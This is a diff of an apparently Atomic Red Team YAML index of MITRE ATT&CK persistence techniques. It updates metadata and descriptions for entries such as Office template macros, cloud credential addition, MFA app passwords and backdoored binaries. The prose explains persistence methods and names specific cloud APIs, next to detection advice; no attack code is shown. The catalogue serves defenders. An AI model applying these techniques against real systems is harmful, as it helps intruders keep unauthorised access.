         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31550,55 +31957,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31629,6 +31991,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31638,9 +32001,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31648,11 +32015,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31684,7 +32087,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31732,13 +32135,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31751,16 +32152,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31772,16 +32173,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31836,7 +32237,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31897,7 +32297,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31973,7 +32372,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -32001,8 +32400,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -32028,7 +32425,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32053,23 +32450,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -32079,11 +32474,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -32094,12 +32493,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -32108,6 +32514,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32116,13 +32523,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -32148,10 +32558,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -32160,10 +32578,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32180,9 +32608,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: AWS - Create Access Key and Secret Key
@@ -32221,7 +32646,7 @@ persistence:
         name: sh
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32296,7 +32721,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32385,24 +32809,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32416,7 +32843,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32431,6 +32858,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32444,11 +32876,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32474,7 +32905,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32488,7 +32918,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32515,8 +32944,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32527,7 +32956,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32568,7 +32998,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32588,12 +33018,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32647,11 +33076,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32738,9 +33166,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32753,12 +33181,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32771,9 +33198,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32782,13 +33211,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
